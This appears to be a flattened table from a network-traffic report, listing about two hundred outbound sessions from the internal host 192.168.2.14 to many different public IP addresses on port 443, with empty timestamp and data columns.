                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11483192.168.2.1437508129.75.58.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11484192.168.2.143895093.87.165.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11485192.168.2.1432940210.101.136.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11486192.168.2.144396045.125.43.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11487192.168.2.1434130104.206.200.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11488192.168.2.1453386216.118.192.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11489192.168.2.145332683.209.47.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11490192.168.2.1455392219.77.91.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11491192.168.2.1442744122.245.172.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11492192.168.2.144093834.99.166.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11493192.168.2.146099048.29.4.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11494192.168.2.143477431.58.159.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11495192.168.2.1441226143.240.9.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11496192.168.2.1438360149.248.151.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11497192.168.2.1437816138.115.240.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11498192.168.2.1452974193.106.149.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11499192.168.2.1454044168.190.194.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11500192.168.2.145300659.149.160.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11501192.168.2.1444886104.151.135.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11502192.168.2.1454470212.13.126.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11503192.168.2.1433422154.217.206.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11504192.168.2.143784068.42.205.38443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11505192.168.2.143731298.34.137.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11506192.168.2.145978866.233.104.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11507192.168.2.144514870.131.27.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11508192.168.2.1448948134.165.190.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11509192.168.2.144336898.128.180.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11510192.168.2.1457798223.11.61.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11511192.168.2.145155283.159.129.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11512192.168.2.1448264114.237.232.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11513192.168.2.145368696.203.81.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11514192.168.2.1434284117.127.184.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11515192.168.2.1449872155.64.172.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11516192.168.2.145510841.68.60.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11517192.168.2.1433592107.198.250.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11518192.168.2.145482625.168.73.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11519192.168.2.1455438113.230.185.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11520192.168.2.1450726105.152.95.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11521192.168.2.145998263.131.63.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11522192.168.2.1448570132.148.229.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11523192.168.2.1447762162.86.85.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11524192.168.2.145261683.228.179.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11525192.168.2.144565227.177.206.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11526192.168.2.1439606109.227.188.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11527192.168.2.1440304166.51.116.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11528192.168.2.1457520155.42.16.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11529192.168.2.1434946152.62.38.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11530192.168.2.1446826183.125.68.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11531192.168.2.1440806169.246.146.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11532192.168.2.144163854.53.127.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11533192.168.2.1452450191.139.12.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11534192.168.2.146061236.14.72.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11535192.168.2.145223291.106.64.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11536192.168.2.143793068.177.236.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11537192.168.2.143305097.101.101.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11538192.168.2.144988648.191.14.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11539192.168.2.1441128177.31.170.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11540192.168.2.145038483.93.170.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11541192.168.2.143893236.238.86.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11542192.168.2.1460464160.8.95.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11543192.168.2.145723024.5.42.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11544192.168.2.1456488114.44.126.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11545192.168.2.143973835.164.87.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11546192.168.2.143889824.239.62.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11547192.168.2.145929089.107.79.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11548192.168.2.1448844171.195.169.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11549192.168.2.143506498.205.71.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11550192.168.2.145625618.21.226.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11551192.168.2.143905250.69.37.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11552192.168.2.145423468.84.0.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11553192.168.2.144790834.43.200.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11554192.168.2.14335885.204.136.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11555192.168.2.1438126197.38.48.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11556192.168.2.1443826196.161.181.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11557192.168.2.1456164141.160.121.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11558192.168.2.1439336121.228.82.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11559192.168.2.144118013.182.68.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11560192.168.2.1458180115.90.72.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11561192.168.2.1442218164.23.45.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11562192.168.2.144678858.41.74.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11563192.168.2.144170023.99.104.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11564192.168.2.145151278.225.232.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11565192.168.2.145405618.113.100.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11566192.168.2.1438220142.165.186.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11567192.168.2.143547098.134.13.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11568192.168.2.1458066200.40.106.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11569192.168.2.1441810160.152.32.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11570192.168.2.145249479.204.113.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11571192.168.2.1455236152.122.86.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11572192.168.2.1435426150.83.221.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11573192.168.2.1443312169.11.103.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11574192.168.2.1440068136.182.10.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11575192.168.2.143731468.137.177.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11576192.168.2.1447340153.194.212.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11577192.168.2.1447990120.224.122.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11578192.168.2.143283251.119.86.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11579192.168.2.1446594113.152.202.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11580192.168.2.145891852.157.213.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11581192.168.2.145559290.4.167.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11582192.168.2.144985268.136.140.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11583192.168.2.144431880.184.206.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11584192.168.2.1452754114.75.10.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11585192.168.2.1453106126.188.30.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11586192.168.2.145937446.83.64.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11587192.168.2.1437716195.105.10.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11588192.168.2.145223678.129.77.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11589192.168.2.1450392172.97.32.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11590192.168.2.145254684.1.115.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11591192.168.2.1433440169.3.205.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11592192.168.2.14383464.252.42.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11593192.168.2.1453820148.212.63.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11594192.168.2.1449376128.221.37.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11595192.168.2.1443164190.153.78.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11596192.168.2.1457454141.194.252.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11597192.168.2.1447296217.224.14.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11598192.168.2.1433922220.137.186.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11599192.168.2.145477684.131.239.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11600192.168.2.1444554138.165.123.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11601192.168.2.143379217.113.116.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11602192.168.2.1459594188.209.5.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11603192.168.2.1454248126.70.108.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11604192.168.2.143484867.116.138.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11605192.168.2.1440648150.151.104.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11606192.168.2.1436810167.42.118.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11607192.168.2.144253844.94.18.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11608192.168.2.1438984149.90.110.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11609192.168.2.143326664.204.22.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11610192.168.2.1460086202.230.75.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11611192.168.2.143542448.91.40.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11612192.168.2.144097092.49.250.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11613192.168.2.1441020134.169.200.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11614192.168.2.1444140179.71.181.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11615192.168.2.146008098.244.22.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11616192.168.2.145869424.97.254.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11617192.168.2.144491420.239.216.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11618192.168.2.144996274.16.217.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11619192.168.2.143975839.208.141.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11620192.168.2.144228661.13.62.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11621192.168.2.1446932144.143.255.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11622192.168.2.144311636.198.229.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11623192.168.2.1435260136.124.160.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11624192.168.2.1436596151.80.95.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11625192.168.2.144735435.69.7.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11626192.168.2.143727074.20.64.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11627192.168.2.1435074121.185.124.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11628192.168.2.144500689.14.247.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11629192.168.2.1455930109.243.175.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11630192.168.2.1442634105.43.249.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11631192.168.2.145720067.201.182.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11632192.168.2.144404253.12.44.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11633192.168.2.145324241.67.18.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11634192.168.2.145289492.25.63.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11635192.168.2.1458638222.136.83.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11636192.168.2.1452600104.3.57.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11637192.168.2.1458266179.90.73.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11638192.168.2.1457578203.94.44.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11639192.168.2.1438246116.2.15.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11640192.168.2.1445702142.109.186.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11641192.168.2.1454478151.112.128.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11642192.168.2.1441486195.83.154.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11643192.168.2.144926881.75.87.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11644192.168.2.145605632.253.94.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11645192.168.2.144475014.247.108.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11646192.168.2.1439284210.191.227.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11647192.168.2.1458656172.94.244.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11648192.168.2.1460068124.85.201.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11649192.168.2.1440470174.135.182.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11650192.168.2.1447688108.125.135.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11651192.168.2.14519728.137.172.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11652192.168.2.1454248119.96.72.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11653192.168.2.1451092147.92.6.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11654192.168.2.145791065.101.65.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11655192.168.2.145133485.10.165.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11656192.168.2.144545664.202.19.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11657192.168.2.145419888.86.9.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11658192.168.2.1442108171.178.251.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11659192.168.2.145349685.42.61.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11660192.168.2.1448390208.46.204.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11661192.168.2.1453582188.186.190.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11662192.168.2.1434024124.181.107.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11663192.168.2.1449022104.79.97.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11664192.168.2.145165051.156.0.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11665192.168.2.1438290202.61.197.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11666192.168.2.1444816216.226.37.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11667192.168.2.145057874.177.114.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11668192.168.2.1453546125.32.43.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11669192.168.2.1449750195.47.36.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11670192.168.2.145217642.54.221.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11671192.168.2.145221444.48.42.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11672192.168.2.143469488.66.138.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11673192.168.2.145863481.4.188.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11674192.168.2.144943461.223.201.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11675192.168.2.1435000222.163.30.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11676192.168.2.1443462221.187.111.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11677192.168.2.1440334149.53.237.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11678192.168.2.1447604200.197.247.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11679192.168.2.143567071.17.250.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11680192.168.2.145788075.164.171.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11681192.168.2.1435600107.164.73.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11682192.168.2.1459702113.74.255.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11683192.168.2.1439908143.38.128.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11684192.168.2.144367664.100.97.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11685192.168.2.145190238.96.169.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11686192.168.2.143383273.98.124.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11687192.168.2.1449670163.102.88.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11688192.168.2.144408413.234.233.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11689192.168.2.1437932207.72.222.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11690192.168.2.145837445.243.0.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11691192.168.2.1435732151.232.102.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11692192.168.2.145387684.205.208.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11693192.168.2.145222080.55.241.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11694192.168.2.14540469.177.145.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
